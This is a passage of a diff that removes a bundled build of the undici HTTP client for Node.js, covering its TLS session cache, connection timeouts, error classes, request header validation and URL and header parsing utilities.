re-use is enabled. 
- -let SessionCache -// FIXME: remove workaround when the Node bug is fixed -// https://github.com/nodejs/node/issues/49344#issuecomment-1741776308 -if (global.FinalizationRegistry && !process.env.NODE_V8_COVERAGE) { - SessionCache = class WeakSessionCache { - constructor (maxCachedSessions) { - this._maxCachedSessions = maxCachedSessions - this._sessionCache = new Map() - this._sessionRegistry = new global.FinalizationRegistry((key) => { - if (this._sessionCache.size < this._maxCachedSessions) { - return - } - - const ref = this._sessionCache.get(key) - if (ref !== undefined && ref.deref() === undefined) { - this._sessionCache.delete(key) - } - }) - } - - get (sessionKey) { - const ref = this._sessionCache.get(sessionKey) - return ref ? ref.deref() : null - } - - set (sessionKey, session) { - if (this._maxCachedSessions === 0) { - return - } - - this._sessionCache.set(sessionKey, new WeakRef(session)) - this._sessionRegistry.register(session, sessionKey) - } - } -} else { - SessionCache = class SimpleSessionCache { - constructor (maxCachedSessions) { - this._maxCachedSessions = maxCachedSessions - this._sessionCache = new Map() - } - - get (sessionKey) { - return this._sessionCache.get(sessionKey) - } - - set (sessionKey, session) { - if (this._maxCachedSessions === 0) { - return - } - - if (this._sessionCache.size >= this._maxCachedSessions) { - // remove the oldest session - const { value: oldestKey } = this._sessionCache.keys().next() - this._sessionCache.delete(oldestKey) - } - - this._sessionCache.set(sessionKey, session) - } - } -} - -function buildConnector ({ allowH2, maxCachedSessions, socketPath, timeout, ...opts }) { - if (maxCachedSessions != null && (!Number.isInteger(maxCachedSessions) || maxCachedSessions < 0)) { - throw new InvalidArgumentError('maxCachedSessions must be a positive integer or zero') - } - - const options = { path: socketPath, ...opts } - const sessionCache = new SessionCache(maxCachedSessions == null ? 
100 : maxCachedSessions) - timeout = timeout == null ? 10e3 : timeout - allowH2 = allowH2 != null ? allowH2 : false - return function connect ({ hostname, host, protocol, port, servername, localAddress, httpSocket }, callback) { - let socket - if (protocol === 'https:') { - if (!tls) { - tls = __nccwpck_require__(4404) - } - servername = servername || options.servername || util.getServerName(host) || null - - const sessionKey = servername || hostname - const session = sessionCache.get(sessionKey) || null - - assert(sessionKey) - - socket = tls.connect({ - highWaterMark: 16384, // TLS in node can't have bigger HWM anyway... - ...options, - servername, - session, - localAddress, - // TODO(HTTP/2): Add support for h2c - ALPNProtocols: allowH2 ? ['http/1.1', 'h2'] : ['http/1.1'], - socket: httpSocket, // upgrade socket connection - port: port || 443, - host: hostname - }) - - socket - .on('session', function (session) { - // TODO (fix): Can a session become invalid once established? Don't think so? - sessionCache.set(sessionKey, session) - }) - } else { - assert(!httpSocket, 'httpSocket can only be sent on TLS update') - socket = net.connect({ - highWaterMark: 64 * 1024, // Same as nodejs fs streams. - ...options, - localAddress, - port: port || 80, - host: hostname - }) - } - - // Set TCP keep alive options on the socket here instead of in connect() for the case of assigning the socket - if (options.keepAlive == null || options.keepAlive) { - const keepAliveInitialDelay = options.keepAliveInitialDelay === undefined ? 60e3 : options.keepAliveInitialDelay - socket.setKeepAlive(true, keepAliveInitialDelay) - } - - const cancelTimeout = setupTimeout(() => onConnectTimeout(socket), timeout) - - socket - .setNoDelay(true) - .once(protocol === 'https:' ? 
'secureConnect' : 'connect', function () { - cancelTimeout() - - if (callback) { - const cb = callback - callback = null - cb(null, this) - } - }) - .on('error', function (err) { - cancelTimeout() - - if (callback) { - const cb = callback - callback = null - cb(err) - } - }) - - return socket - } -} - -function setupTimeout (onConnectTimeout, timeout) { - if (!timeout) { - return () => {} - } - - let s1 = null - let s2 = null - const timeoutId = setTimeout(() => { - // setImmediate is added to make sure that we priotorise socket error events over timeouts - s1 = setImmediate(() => { - if (process.platform === 'win32') { - // Windows needs an extra setImmediate probably due to implementation differences in the socket logic - s2 = setImmediate(() => onConnectTimeout()) - } else { - onConnectTimeout() - } - }) - }, timeout) - return () => { - clearTimeout(timeoutId) - clearImmediate(s1) - clearImmediate(s2) - } -} - -function onConnectTimeout (socket) { - util.destroy(socket, new ConnectTimeoutError()) -} - -module.exports = buildConnector - - -/***/ }), - -/***/ 8045: -/***/ ((module) => { - -"use strict"; - - -class UndiciError extends Error { - constructor (message) { - super(message) - this.name = 'UndiciError' - this.code = 'UND_ERR' - } -} - -class ConnectTimeoutError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, ConnectTimeoutError) - this.name = 'ConnectTimeoutError' - this.message = message || 'Connect Timeout Error' - this.code = 'UND_ERR_CONNECT_TIMEOUT' - } -} - -class HeadersTimeoutError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, HeadersTimeoutError) - this.name = 'HeadersTimeoutError' - this.message = message || 'Headers Timeout Error' - this.code = 'UND_ERR_HEADERS_TIMEOUT' - } -} - -class HeadersOverflowError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, HeadersOverflowError) - this.name = 
'HeadersOverflowError' - this.message = message || 'Headers Overflow Error' - this.code = 'UND_ERR_HEADERS_OVERFLOW' - } -} - -class BodyTimeoutError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, BodyTimeoutError) - this.name = 'BodyTimeoutError' - this.message = message || 'Body Timeout Error' - this.code = 'UND_ERR_BODY_TIMEOUT' - } -} - -class ResponseStatusCodeError extends UndiciError { - constructor (message, statusCode, headers, body) { - super(message) - Error.captureStackTrace(this, ResponseStatusCodeError) - this.name = 'ResponseStatusCodeError' - this.message = message || 'Response Status Code Error' - this.code = 'UND_ERR_RESPONSE_STATUS_CODE' - this.body = body - this.status = statusCode - this.statusCode = statusCode - this.headers = headers - } -} - -class InvalidArgumentError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, InvalidArgumentError) - this.name = 'InvalidArgumentError' - this.message = message || 'Invalid Argument Error' - this.code = 'UND_ERR_INVALID_ARG' - } -} - -class InvalidReturnValueError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, InvalidReturnValueError) - this.name = 'InvalidReturnValueError' - this.message = message || 'Invalid Return Value Error' - this.code = 'UND_ERR_INVALID_RETURN_VALUE' - } -} - -class RequestAbortedError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, RequestAbortedError) - this.name = 'AbortError' - this.message = message || 'Request aborted' - this.code = 'UND_ERR_ABORTED' - } -} - -class InformationalError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, InformationalError) - this.name = 'InformationalError' - this.message = message || 'Request information' - this.code = 'UND_ERR_INFO' - } -} - -class RequestContentLengthMismatchError extends UndiciError { 
- constructor (message) { - super(message) - Error.captureStackTrace(this, RequestContentLengthMismatchError) - this.name = 'RequestContentLengthMismatchError' - this.message = message || 'Request body length does not match content-length header' - this.code = 'UND_ERR_REQ_CONTENT_LENGTH_MISMATCH' - } -} - -class ResponseContentLengthMismatchError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, ResponseContentLengthMismatchError) - this.name = 'ResponseContentLengthMismatchError' - this.message = message || 'Response body length does not match content-length header' - this.code = 'UND_ERR_RES_CONTENT_LENGTH_MISMATCH' - } -} - -class ClientDestroyedError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, ClientDestroyedError) - this.name = 'ClientDestroyedError' - this.message = message || 'The client is destroyed' - this.code = 'UND_ERR_DESTROYED' - } -} - -class ClientClosedError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, ClientClosedError) - this.name = 'ClientClosedError' - this.message = message || 'The client is closed' - this.code = 'UND_ERR_CLOSED' - } -} - -class SocketError extends UndiciError { - constructor (message, socket) { - super(message) - Error.captureStackTrace(this, SocketError) - this.name = 'SocketError' - this.message = message || 'Socket error' - this.code = 'UND_ERR_SOCKET' - this.socket = socket - } -} - -class NotSupportedError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, NotSupportedError) - this.name = 'NotSupportedError' - this.message = message || 'Not supported error' - this.code = 'UND_ERR_NOT_SUPPORTED' - } -} - -class BalancedPoolMissingUpstreamError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, NotSupportedError) - this.name = 'MissingUpstreamError' - this.message = message || 'No 
upstream has been added to the BalancedPool' - this.code = 'UND_ERR_BPL_MISSING_UPSTREAM' - } -} - -class HTTPParserError extends Error { - constructor (message, code, data) { - super(message) - Error.captureStackTrace(this, HTTPParserError) - this.name = 'HTTPParserError' - this.code = code ? `HPE_${code}` : undefined - this.data = data ? data.toString() : undefined - } -} - -class ResponseExceededMaxSizeError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, ResponseExceededMaxSizeError) - this.name = 'ResponseExceededMaxSizeError' - this.message = message || 'Response content exceeded max size' - this.code = 'UND_ERR_RES_EXCEEDED_MAX_SIZE' - } -} - -class RequestRetryError extends UndiciError { - constructor (message, code, { headers, data }) { - super(message) - Error.captureStackTrace(this, RequestRetryError) - this.name = 'RequestRetryError' - this.message = message || 'Request retry error' - this.code = 'UND_ERR_REQ_RETRY' - this.statusCode = code - this.data = data - this.headers = headers - } -} - -module.exports = { - HTTPParserError, - UndiciError, - HeadersTimeoutError, - HeadersOverflowError, - BodyTimeoutError, - RequestContentLengthMismatchError, - ConnectTimeoutError, - ResponseStatusCodeError, - InvalidArgumentError, - InvalidReturnValueError, - RequestAbortedError, - ClientDestroyedError, - ClientClosedError, - InformationalError, - SocketError, - NotSupportedError, - ResponseContentLengthMismatchError, - BalancedPoolMissingUpstreamError, - ResponseExceededMaxSizeError, - RequestRetryError -} - - -/***/ }), - -/***/ 2905: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { - InvalidArgumentError, - NotSupportedError -} = __nccwpck_require__(8045) -const assert = __nccwpck_require__(9491) -const { kHTTP2BuildRequest, kHTTP2CopyHeaders, kHTTP1BuildRequest } = __nccwpck_require__(2785) -const util = __nccwpck_require__(3983) - -// tokenRegExp and 
headerCharRegex have been lifted from -// https://github.com/nodejs/node/blob/main/lib/_http_common.js - -/** - * Verifies that the given val is a valid HTTP token - * per the rules defined in RFC 7230 - * See https://tools.ietf.org/html/rfc7230#section-3.2.6 - */ -const tokenRegExp = /^[\^_`a-zA-Z\-0-9!#$%&'*+.|~]+$/ - -/** - * Matches if val contains an invalid field-vchar - * field-value = *( field-content / obs-fold ) - * field-content = field-vchar [ 1*( SP / HTAB ) field-vchar ] - * field-vchar = VCHAR / obs-text - */ -const headerCharRegex = /[^\t\x20-\x7e\x80-\xff]/ - -// Verifies that a given path is valid does not contain control chars \x00 to \x20 -const invalidPathRegex = /[^\u0021-\u00ff]/ - -const kHandler = Symbol('handler') - -const channels = {} - -let extractBody - -try { - const diagnosticsChannel = __nccwpck_require__(7643) - channels.create = diagnosticsChannel.channel('undici:request:create') - channels.bodySent = diagnosticsChannel.channel('undici:request:bodySent') - channels.headers = diagnosticsChannel.channel('undici:request:headers') - channels.trailers = diagnosticsChannel.channel('undici:request:trailers') - channels.error = diagnosticsChannel.channel('undici:request:error') -} catch { - channels.create = { hasSubscribers: false } - channels.bodySent = { hasSubscribers: false } - channels.headers = { hasSubscribers: false } - channels.trailers = { hasSubscribers: false } - channels.error = { hasSubscribers: false } -} - -class Request { - constructor (origin, { - path, - method, - body, - headers, - query, - idempotent, - blocking, - upgrade, - headersTimeout, - bodyTimeout, - reset, - throwOnError, - expectContinue - }, handler) { - if (typeof path !== 'string') { - throw new InvalidArgumentError('path must be a string') - } else if ( - path[0] !== '/' && - !(path.startsWith('http://') || path.startsWith('https://')) && - method !== 'CONNECT' - ) { - throw new InvalidArgumentError('path must be an absolute URL or start with a slash') 
- } else if (invalidPathRegex.exec(path) !== null) { - throw new InvalidArgumentError('invalid request path') - } - - if (typeof method !== 'string') { - throw new InvalidArgumentError('method must be a string') - } else if (tokenRegExp.exec(method) === null) { - throw new InvalidArgumentError('invalid request method') - } - - if (upgrade && typeof upgrade !== 'string') { - throw new InvalidArgumentError('upgrade must be a string') - } - - if (headersTimeout != null && (!Number.isFinite(headersTimeout) || headersTimeout < 0)) { - throw new InvalidArgumentError('invalid headersTimeout') - } - - if (bodyTimeout != null && (!Number.isFinite(bodyTimeout) || bodyTimeout < 0)) { - throw new InvalidArgumentError('invalid bodyTimeout') - } - - if (reset != null && typeof reset !== 'boolean') { - throw new InvalidArgumentError('invalid reset') - } - - if (expectContinue != null && typeof expectContinue !== 'boolean') { - throw new InvalidArgumentError('invalid expectContinue') - } - - this.headersTimeout = headersTimeout - - this.bodyTimeout = bodyTimeout - - this.throwOnError = throwOnError === true - - this.method = method - - this.abort = null - - if (body == null) { - this.body = null - } else if (util.isStream(body)) { - this.body = body - - const rState = this.body._readableState - if (!rState || !rState.autoDestroy) { - this.endHandler = function autoDestroy () { - util.destroy(this) - } - this.body.on('end', this.endHandler) - } - - this.errorHandler = err => { - if (this.abort) { - this.abort(err) - } else { - this.error = err - } - } - this.body.on('error', this.errorHandler) - } else if (util.isBuffer(body)) { - this.body = body.byteLength ? body : null - } else if (ArrayBuffer.isView(body)) { - this.body = body.buffer.byteLength ? Buffer.from(body.buffer, body.byteOffset, body.byteLength) : null - } else if (body instanceof ArrayBuffer) { - this.body = body.byteLength ? Buffer.from(body) : null - } else if (typeof body === 'string') { - this.body = body.length ? 
Buffer.from(body) : null - } else if (util.isFormDataLike(body) || util.isIterable(body) || util.isBlobLike(body)) { - this.body = body - } else { - throw new InvalidArgumentError('body must be a string, a Buffer, a Readable stream, an iterable, or an async iterable') - } - - this.completed = false - - this.aborted = false - - this.upgrade = upgrade || null - - this.path = query ? util.buildURL(path, query) : path - - this.origin = origin - - this.idempotent = idempotent == null - ? method === 'HEAD' || method === 'GET' - : idempotent - - this.blocking = blocking == null ? false : blocking - - this.reset = reset == null ? null : reset - - this.host = null - - this.contentLength = null - - this.contentType = null - - this.headers = '' - - // Only for H2 - this.expectContinue = expectContinue != null ? expectContinue : false - - if (Array.isArray(headers)) { - if (headers.length % 2 !== 0) { - throw new InvalidArgumentError('headers array must be even') - } - for (let i = 0; i < headers.length; i += 2) { - processHeader(this, headers[i], headers[i + 1]) - } - } else if (headers && typeof headers === 'object') { - const keys = Object.keys(headers) - for (let i = 0; i < keys.length; i++) { - const key = keys[i] - processHeader(this, key, headers[key]) - } - } else if (headers != null) { - throw new InvalidArgumentError('headers must be an object or an array') - } - - if (util.isFormDataLike(this.body)) { - if (util.nodeMajor < 16 || (util.nodeMajor === 16 && util.nodeMinor < 8)) { - throw new InvalidArgumentError('Form-Data bodies are only supported in node v16.8 and newer.') - } - - if (!extractBody) { - extractBody = (__nccwpck_require__(1472).extractBody) - } - - const [bodyStream, contentType] = extractBody(body) - if (this.contentType == null) { - this.contentType = contentType - this.headers += `content-type: ${contentType}\r\n` - } - this.body = bodyStream.stream - this.contentLength = bodyStream.length - } else if (util.isBlobLike(body) && this.contentType == 
null && body.type) { - this.contentType = body.type - this.headers += `content-type: ${body.type}\r\n` - } - - util.validateHandler(handler, method, upgrade) - - this.servername = util.getServerName(this.host) - - this[kHandler] = handler - - if (channels.create.hasSubscribers) { - channels.create.publish({ request: this }) - } - } - - onBodySent (chunk) { - if (this[kHandler].onBodySent) { - try { - return this[kHandler].onBodySent(chunk) - } catch (err) { - this.abort(err) - } - } - } - - onRequestSent () { - if (channels.bodySent.hasSubscribers) { - channels.bodySent.publish({ request: this }) - } - - if (this[kHandler].onRequestSent) { - try { - return this[kHandler].onRequestSent() - } catch (err) { - this.abort(err) - } - } - } - - onConnect (abort) { - assert(!this.aborted) - assert(!this.completed) - - if (this.error) { - abort(this.error) - } else { - this.abort = abort - return this[kHandler].onConnect(abort) - } - } - - onHeaders (statusCode, headers, resume, statusText) { - assert(!this.aborted) - assert(!this.completed) - - if (channels.headers.hasSubscribers) { - channels.headers.publish({ request: this, response: { statusCode, headers, statusText } }) - } - - try { - return this[kHandler].onHeaders(statusCode, headers, resume, statusText) - } catch (err) { - this.abort(err) - } - } - - onData (chunk) { - assert(!this.aborted) - assert(!this.completed) - - try { - return this[kHandler].onData(chunk) - } catch (err) { - this.abort(err) - return false - } - } - - onUpgrade (statusCode, headers, socket) { - assert(!this.aborted) - assert(!this.completed) - - return this[kHandler].onUpgrade(statusCode, headers, socket) - } - - onComplete (trailers) { - this.onFinally() - - assert(!this.aborted) - - this.completed = true - if (channels.trailers.hasSubscribers) { - channels.trailers.publish({ request: this, trailers }) - } - - try { - return this[kHandler].onComplete(trailers) - } catch (err) { - // TODO (fix): This might be a bad idea? 
- this.onError(err) - } - } - - onError (error) { - this.onFinally() - - if (channels.error.hasSubscribers) { - channels.error.publish({ request: this, error }) - } - - if (this.aborted) { - return - } - this.aborted = true - - return this[kHandler].onError(error) - } - - onFinally () { - if (this.errorHandler) { - this.body.off('error', this.errorHandler) - this.errorHandler = null - } - - if (this.endHandler) { - this.body.off('end', this.endHandler) - this.endHandler = null - } - } - - // TODO: adjust to support H2 - addHeader (key, value) { - processHeader(this, key, value) - return this - } - - static [kHTTP1BuildRequest] (origin, opts, handler) { - // TODO: Migrate header parsing here, to make Requests - // HTTP agnostic - return new Request(origin, opts, handler) - } - - static [kHTTP2BuildRequest] (origin, opts, handler) { - const headers = opts.headers - opts = { ...opts, headers: null } - - const request = new Request(origin, opts, handler) - - request.headers = {} - - if (Array.isArray(headers)) { - if (headers.length % 2 !== 0) { - throw new InvalidArgumentError('headers array must be even') - } - for (let i = 0; i < headers.length; i += 2) { - processHeader(request, headers[i], headers[i + 1], true) - } - } else if (headers && typeof headers === 'object') { - const keys = Object.keys(headers) - for (let i = 0; i < keys.length; i++) { - const key = keys[i] - processHeader(request, key, headers[key], true) - } - } else if (headers != null) { - throw new InvalidArgumentError('headers must be an object or an array') - } - - return request - } - - static [kHTTP2CopyHeaders] (raw) { - const rawHeaders = raw.split('\r\n') - const headers = {} - - for (const header of rawHeaders) { - const [key, value] = header.split(': ') - - if (value == null || value.length === 0) continue - - if (headers[key]) headers[key] += `,${value}` - else headers[key] = value - } - - return headers - } -} - -function processHeaderValue (key, val, skipAppend) { - if (val && typeof val 
=== 'object') { - throw new InvalidArgumentError(`invalid ${key} header`) - } - - val = val != null ? `${val}` : '' - - if (headerCharRegex.exec(val) !== null) { - throw new InvalidArgumentError(`invalid ${key} header`) - } - - return skipAppend ? val : `${key}: ${val}\r\n` -} - -function processHeader (request, key, val, skipAppend = false) { - if (val && (typeof val === 'object' && !Array.isArray(val))) { - throw new InvalidArgumentError(`invalid ${key} header`) - } else if (val === undefined) { - return - } - - if ( - request.host === null && - key.length === 4 && - key.toLowerCase() === 'host' - ) { - if (headerCharRegex.exec(val) !== null) { - throw new InvalidArgumentError(`invalid ${key} header`) - } - // Consumed by Client - request.host = val - } else if ( - request.contentLength === null && - key.length === 14 && - key.toLowerCase() === 'content-length' - ) { - request.contentLength = parseInt(val, 10) - if (!Number.isFinite(request.contentLength)) { - throw new InvalidArgumentError('invalid content-length header') - } - } else if ( - request.contentType === null && - key.length === 12 && - key.toLowerCase() === 'content-type' - ) { - request.contentType = val - if (skipAppend) request.headers[key] = processHeaderValue(key, val, skipAppend) - else request.headers += processHeaderValue(key, val) - } else if ( - key.length === 17 && - key.toLowerCase() === 'transfer-encoding' - ) { - throw new InvalidArgumentError('invalid transfer-encoding header') - } else if ( - key.length === 10 && - key.toLowerCase() === 'connection' - ) { - const value = typeof val === 'string' ? 
val.toLowerCase() : null - if (value !== 'close' && value !== 'keep-alive') { - throw new InvalidArgumentError('invalid connection header') - } else if (value === 'close') { - request.reset = true - } - } else if ( - key.length === 10 && - key.toLowerCase() === 'keep-alive' - ) { - throw new InvalidArgumentError('invalid keep-alive header') - } else if ( - key.length === 7 && - key.toLowerCase() === 'upgrade' - ) { - throw new InvalidArgumentError('invalid upgrade header') - } else if ( - key.length === 6 && - key.toLowerCase() === 'expect' - ) { - throw new NotSupportedError('expect header not supported') - } else if (tokenRegExp.exec(key) === null) { - throw new InvalidArgumentError('invalid header key') - } else { - if (Array.isArray(val)) { - for (let i = 0; i < val.length; i++) { - if (skipAppend) { - if (request.headers[key]) request.headers[key] += `,${processHeaderValue(key, val[i], skipAppend)}` - else request.headers[key] = processHeaderValue(key, val[i], skipAppend) - } else { - request.headers += processHeaderValue(key, val[i]) - } - } - } else { - if (skipAppend) request.headers[key] = processHeaderValue(key, val, skipAppend) - else request.headers += processHeaderValue(key, val) - } - } -} - -module.exports = Request - - -/***/ }), - -/***/ 2785: -/***/ ((module) => { - -module.exports = { - kClose: Symbol('close'), - kDestroy: Symbol('destroy'), - kDispatch: Symbol('dispatch'), - kUrl: Symbol('url'), - kWriting: Symbol('writing'), - kResuming: Symbol('resuming'), - kQueue: Symbol('queue'), - kConnect: Symbol('connect'), - kConnecting: Symbol('connecting'), - kHeadersList: Symbol('headers list'), - kKeepAliveDefaultTimeout: Symbol('default keep alive timeout'), - kKeepAliveMaxTimeout: Symbol('max keep alive timeout'), - kKeepAliveTimeoutThreshold: Symbol('keep alive timeout threshold'), - kKeepAliveTimeoutValue: Symbol('keep alive timeout'), - kKeepAlive: Symbol('keep alive'), - kHeadersTimeout: Symbol('headers timeout'), - kBodyTimeout: Symbol('body 
timeout'), - kServerName: Symbol('server name'), - kLocalAddress: Symbol('local address'), - kHost: Symbol('host'), - kNoRef: Symbol('no ref'), - kBodyUsed: Symbol('used'), - kRunning: Symbol('running'), - kBlocking: Symbol('blocking'), - kPending: Symbol('pending'), - kSize: Symbol('size'), - kBusy: Symbol('busy'), - kQueued: Symbol('queued'), - kFree: Symbol('free'), - kConnected: Symbol('connected'), - kClosed: Symbol('closed'), - kNeedDrain: Symbol('need drain'), - kReset: Symbol('reset'), - kDestroyed: Symbol.for('nodejs.stream.destroyed'), - kMaxHeadersSize: Symbol('max headers size'), - kRunningIdx: Symbol('running index'), - kPendingIdx: Symbol('pending index'), - kError: Symbol('error'), - kClients: Symbol('clients'), - kClient: Symbol('client'), - kParser: Symbol('parser'), - kOnDestroyed: Symbol('destroy callbacks'), - kPipelining: Symbol('pipelining'), - kSocket: Symbol('socket'), - kHostHeader: Symbol('host header'), - kConnector: Symbol('connector'), - kStrictContentLength: Symbol('strict content length'), - kMaxRedirections: Symbol('maxRedirections'), - kMaxRequests: Symbol('maxRequestsPerClient'), - kProxy: Symbol('proxy agent options'), - kCounter: Symbol('socket request counter'), - kInterceptors: Symbol('dispatch interceptors'), - kMaxResponseSize: Symbol('max response size'), - kHTTP2Session: Symbol('http2Session'), - kHTTP2SessionState: Symbol('http2Session state'), - kHTTP2BuildRequest: Symbol('http2 build request'), - kHTTP1BuildRequest: Symbol('http1 build request'), - kHTTP2CopyHeaders: Symbol('http2 copy headers'), - kHTTPConnVersion: Symbol('http connection version'), - kRetryHandlerDefaultRetry: Symbol('retry agent default retry'), - kConstruct: Symbol('constructable') -} - - -/***/ }), - -/***/ 3983: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const assert = __nccwpck_require__(9491) -const { kDestroyed, kBodyUsed } = __nccwpck_require__(2785) -const { IncomingMessage } = 
__nccwpck_require__(3685) -const stream = __nccwpck_require__(2781) -const net = __nccwpck_require__(1808) -const { InvalidArgumentError } = __nccwpck_require__(8045) -const { Blob } = __nccwpck_require__(4300) -const nodeUtil = __nccwpck_require__(3837) -const { stringify } = __nccwpck_require__(3477) - -const [nodeMajor, nodeMinor] = process.versions.node.split('.').map(v => Number(v)) - -function nop () {} - -function isStream (obj) { - return obj && typeof obj === 'object' && typeof obj.pipe === 'function' && typeof obj.on === 'function' -} - -// based on https://github.com/node-fetch/fetch-blob/blob/8ab587d34080de94140b54f07168451e7d0b655e/index.js#L229-L241 (MIT License) -function isBlobLike (object) { - return (Blob && object instanceof Blob) || ( - object && - typeof object === 'object' && - (typeof object.stream === 'function' || - typeof object.arrayBuffer === 'function') && - /^(Blob|File)$/.test(object[Symbol.toStringTag]) - ) -} - -function buildURL (url, queryParams) { - if (url.includes('?') || url.includes('#')) { - throw new Error('Query params cannot be passed when url already contains "?" or "#".') - } - - const stringified = stringify(queryParams) - - if (stringified) { - url += '?' 
+ stringified - } - - return url -} - -function parseURL (url) { - if (typeof url === 'string') { - url = new URL(url) - - if (!/^https?:/.test(url.origin || url.protocol)) { - throw new InvalidArgumentError('Invalid URL protocol: the URL must start with `http:` or `https:`.') - } - - return url - } - - if (!url || typeof url !== 'object') { - throw new InvalidArgumentError('Invalid URL: The URL argument must be a non-null object.') - } - - if (!/^https?:/.test(url.origin || url.protocol)) { - throw new InvalidArgumentError('Invalid URL protocol: the URL must start with `http:` or `https:`.') - } - - if (!(url instanceof URL)) { - if (url.port != null && url.port !== '' && !Number.isFinite(parseInt(url.port))) { - throw new InvalidArgumentError('Invalid URL: port must be a valid integer or a string representation of an integer.') - } - - if (url.path != null && typeof url.path !== 'string') { - throw new InvalidArgumentError('Invalid URL path: the path must be a string or null/undefined.') - } - - if (url.pathname != null && typeof url.pathname !== 'string') { - throw new InvalidArgumentError('Invalid URL pathname: the pathname must be a string or null/undefined.') - } - - if (url.hostname != null && typeof url.hostname !== 'string') { - throw new InvalidArgumentError('Invalid URL hostname: the hostname must be a string or null/undefined.') - } - - if (url.origin != null && typeof url.origin !== 'string') { - throw new InvalidArgumentError('Invalid URL origin: the origin must be a string or null/undefined.') - } - - const port = url.port != null - ? url.port - : (url.protocol === 'https:' ? 443 : 80) - let origin = url.origin != null - ? url.origin - : `${url.protocol}//${url.hostname}:${port}` - let path = url.path != null - ? 
url.path - : `${url.pathname || ''}${url.search || ''}` - - if (origin.endsWith('/')) { - origin = origin.substring(0, origin.length - 1) - } - - if (path && !path.startsWith('/')) { - path = `/${path}` - } - // new URL(path, origin) is unsafe when `path` contains an absolute URL - // From https://developer.mozilla.org/en-US/docs/Web/API/URL/URL: - // If first parameter is a relative URL, second param is required, and will be used as the base URL. - // If first parameter is an absolute URL, a given second param will be ignored. - url = new URL(origin + path) - } - - return url -} - -function parseOrigin (url) { - url = parseURL(url) - - if (url.pathname !== '/' || url.search || url.hash) { - throw new InvalidArgumentError('invalid url') - } - - return url -} - -function getHostname (host) { - if (host[0] === '[') { - const idx = host.indexOf(']') - - assert(idx !== -1) - return host.substring(1, idx) - } - - const idx = host.indexOf(':') - if (idx === -1) return host - - return host.substring(0, idx) -} - -// IP addresses are not valid server names per RFC6066 -// > Currently, the only server names supported are DNS hostnames -function getServerName (host) { - if (!host) { - return null - } - - assert.strictEqual(typeof host, 'string') - - const servername = getHostname(host) - if (net.isIP(servername)) { - return '' - } - - return servername -} - -function deepClone (obj) { - return JSON.parse(JSON.stringify(obj)) -} - -function isAsyncIterable (obj) { - return !!(obj != null && typeof obj[Symbol.asyncIterator] === 'function') -} - -function isIterable (obj) { - return !!(obj != null && (typeof obj[Symbol.iterator] === 'function' || typeof obj[Symbol.asyncIterator] === 'function')) -} - -function bodyLength (body) { - if (body == null) { - return 0 - } else if (isStream(body)) { - const state = body._readableState - return state && state.objectMode === false && state.ended === true && Number.isFinite(state.length) - ? 
state.length - : null - } else if (isBlobLike(body)) { - return body.size != null ? body.size : null - } else if (isBuffer(body)) { - return body.byteLength - } - - return null -} - -function isDestroyed (stream) { - return !stream || !!(stream.destroyed || stream[kDestroyed]) -} - -function isReadableAborted (stream) { - const state = stream && stream._readableState - return isDestroyed(stream) && state && !state.endEmitted -} - -function destroy (stream, err) { - if (stream == null || !isStream(stream) || isDestroyed(stream)) { - return - } - - if (typeof stream.destroy === 'function') { - if (Object.getPrototypeOf(stream).constructor === IncomingMessage) { - // See: https://github.com/nodejs/node/pull/38505/files - stream.socket = null - } - - stream.destroy(err) - } else if (err) { - process.nextTick((stream, err) => { - stream.emit('error', err) - }, stream, err) - } - - if (stream.destroyed !== true) { - stream[kDestroyed] = true - } -} - -const KEEPALIVE_TIMEOUT_EXPR = /timeout=(\d+)/ -function parseKeepAliveTimeout (val) { - const m = val.toString().match(KEEPALIVE_TIMEOUT_EXPR) - return m ? 
parseInt(m[1], 10) * 1000 : null -} - -function parseHeaders (headers, obj = {}) { - // For H2 support - if (!Array.isArray(headers)) return headers - - for (let i = 0; i < headers.length; i += 2) { - const key = headers[i].toString().toLowerCase() - let val = obj[key] - - if (!val) { - if (Array.isArray(headers[i + 1])) { - obj[key] = headers[i + 1].map(x => x.toString('utf8')) - } else { - obj[key] = headers[i + 1].toString('utf8') - } - } else { - if (!Array.isArray(val)) { - val = [val] - obj[key] = val - } - val.push(headers[i + 1].toString('utf8')) - } - } - - // See https://github.com/nodejs/node/pull/46528 - if ('content-length' in obj && 'content-disposition' in obj) { - obj['content-disposition'] = Buffer.from(obj['content-disposition']).toString('latin1') - } - - return obj -} - -function parseRawHeaders (headers) { - const ret = [] - let hasContentLength = false - let contentDispositionIdx = -1 - - for (let n = 0; n < headers.length; n += 2) { - const key = headers[n + 0].toString() - const val = headers[n + 1].toString('utf8') - - if (key.length === 14 && (key === 'content-length' || key.toLowerCase() === 'content-length')) { - ret.push(key, val) - hasContentLength = true - } else if (key.length === 19 && (key === 'content-disposition' || key.toLowerCase() === 'content-disposition')) { - contentDispositionIdx = ret.push(key, val) - 1 - } else { - ret.push(key, val) - } - } - - // See https://github.com/nodejs/node/pull/46528 - if (hasContentLength && contentDispositionIdx !== -1) { - ret[contentDispositionIdx] = Buffer.from(ret[contentDispositionIdx]).toString('latin1') - } - - return ret -} - -function isBuffer (buffer) { - // See, https://github.com/mcollina/undici/pull/319 - return buffer instanceof Uint8Array || Buffer.isBuffer(buffer) -} - -function validateHandler (handler, method, upgrade) { - if (!handler || typeof handler !== 'object') { - throw new InvalidArgumentError('handler must be an object') - } - - if (typeof handler.onConnect !== 
